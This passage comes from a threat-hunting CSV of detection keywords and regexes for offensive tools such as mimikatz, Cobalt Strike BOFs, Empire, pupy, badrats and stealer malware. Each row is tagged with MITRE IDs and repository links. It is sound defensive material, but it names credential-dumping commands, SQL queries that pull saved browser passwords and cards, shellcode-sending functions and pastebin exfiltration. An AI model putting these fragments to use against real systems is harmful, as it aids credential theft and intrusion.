PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::tickets*",".{0,1000}sekurlsa\:\:tickets.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::trust*",".{0,1000}sekurlsa\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::tspkg*",".{0,1000}sekurlsa\:\:tspkg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*sekurlsa::wdigest*",".{0,1000}sekurlsa\:\:wdigest.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*SELECT * FROM EvilSignature*",".{0,1000}SELECT\s.{0,1000}\sFROM\sEvilSignature.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","172","29","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z" "*SELECT * FROM EvilSignature*",".{0,1000}SELECT\s.{0,1000}\sFROM\sEvilSignature.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","N/A","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","10","10","3","0","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z" "*SELECT * from smbsr WHERE *",".{0,1000}SELECT\s.{0,1000}\sfrom\ssmbsr\sWHERE\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*SELECT action_url, username_value, password_value FROM logins'*",".{0,1000}SELECT\saction_url,\susername_value,\spassword_value\sFROM\slogins\'.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*SELECT displayName FROM AntiVirusProduct*",".{0,1000}SELECT\sdisplayName\sFROM\sAntiVirusProduct.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","50","4","2024-04-12T15:25:40Z","2023-04-19T10:59:30Z" "*SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards*",".{0,1000}SELECT\sname_on_card,\sexpiration_month,\sexpiration_year,\scard_number_encrypted\sFROM\scredit_cards.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*SELECT SYSTEM_USER as 'Logged in as'* CURRENT_USER as 'Mapped as'*",".{0,1000}SELECT\sSYSTEM_USER\sas\s\'Logged\sin\sas\'.{0,1000}\sCURRENT_USER\sas\s\'Mapped\sas\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","669","140","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" "*self.sprayer.auth_O365*",".{0,1000}self\.sprayer\.auth_O365.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*self_delete.x64.o*",".{0,1000}self_delete\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","166","23","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" "*Self_Deletion_BOF*",".{0,1000}Self_Deletion_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","166","23","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z" "*-selfdelete.exe -d:selfdelete*",".{0,1000}\-selfdelete\.exe\s\-d\:selfdelete.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*SeManageVolumeExploit.*",".{0,1000}SeManageVolumeExploit\..{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","65","15","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*SeManageVolumeExploit-main",".{0,1000}SeManageVolumeExploit\-main","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","65","15","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*Semperis/GoldenGMSA*",".{0,1000}Semperis\/GoldenGMSA.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","123","21","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z" "*send \*\[ \\*\$BASH\\* = \\*/bin/bash\\* -o \\*\$SHELL\\* = \\*/bin/bash\\* \]*",".{0,1000}send\s\\.{0,1000}\\\[\s\\\\.{0,1000}\\\$BASH\\\\.{0,1000}\s\=\s\\\\.{0,1000}\/bin\/bash\\\\.{0,1000}\s\-o\s\\\\.{0,1000}\\\$SHELL\\\\.{0,1000}\s\=\s\\\\.{0,1000}\/bin\/bash\\\\.{0,1000}\s\\\].{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*Send a file via DoH.*",".{0,1000}Send\sa\sfile\svia\sDoH\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*Send the payload with the grooms*",".{0,1000}Send\sthe\spayload\swith\sthe\sgrooms.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*send_invoke_shellcode(*ratID*",".{0,1000}send_invoke_shellcode\(.{0,1000}ratID.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*send_ps1_payload*",".{0,1000}send_ps1_payload.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*send_ratcode(ratID=*",".{0,1000}send_ratcode\(ratID\=.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*send_shellcode_msbuild_xml(*ratID*",".{0,1000}send_shellcode_msbuild_xml\(.{0,1000}ratID.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*send_shellcode_via_pipe*",".{0,1000}send_shellcode_via_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","109","14","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z" "*send_shellcode_via_pipe*",".{0,1000}send_shellcode_via_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*Send-CalendarNTLMLeak *",".{0,1000}Send\-CalendarNTLMLeak\s.{0,1000}","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","338","62","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" "*sendcmd(*cmd:PSCMDMessage*",".{0,1000}sendcmd\(.{0,1000}cmd\:PSCMDMessage.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*Sending loot to pastebin webserver.*",".{0,1000}Sending\sloot\sto\spastebin\swebserver\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","script content","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*Sending malicious packet to infected machine*",".{0,1000}Sending\smalicious\spacket\sto\sinfected\smachine.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Sending malicious packet to infected machine*",".{0,1000}Sending\smalicious\spacket\sto\sinfected\smachine.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "*Sending msf payload *",".{0,1000}Sending\smsf\spayload\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*sendmail -osendmail chmod +x sendmail*",".{0,1000}sendmail\s\-osendmail\schmod\s\+x\ssendmail.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4071","2067","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*sends the jscript file to the rat (JS and HTA only) to be evaulated in line. Useful for Gadget2JS payloads*",".{0,1000}sends\sthe\sjscript\sfile\sto\sthe\srat\s\(JS\sand\sHTA\sonly\)\sto\sbe\sevaulated\sin\sline\.\sUseful\sfor\sGadget2JS\spayloads.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*SendToPasteBin.ps1*",".{0,1000}SendToPasteBin\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*sense2john.py*",".{0,1000}sense2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*SenseCncProxy.exe*",".{0,1000}SenseCncProxy\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*sensepost/goDoH*",".{0,1000}sensepost\/goDoH.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*sensepost/godoh*",".{0,1000}sensepost\/godoh.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*sensepost/impersonate*",".{0,1000}sensepost\/impersonate.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","1","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "*sensepost/kwetza*",".{0,1000}sensepost\/kwetza.{0,1000}","offensive_tool_keyword","kwetza","Kwetza infects an existing Android application with either custom or default payload templates to avoid detection by antivirus. Kwetza allows you to infect Android applications using the target applications default permissions or inject additional permissions to gain additional functionality.","T1402 - T1027 - T1059.001 - T1574.002 - T1583.001 - T1588.002","TA0001 - TA0004 - TA0005 - TA0011","N/A","N/A","Defense 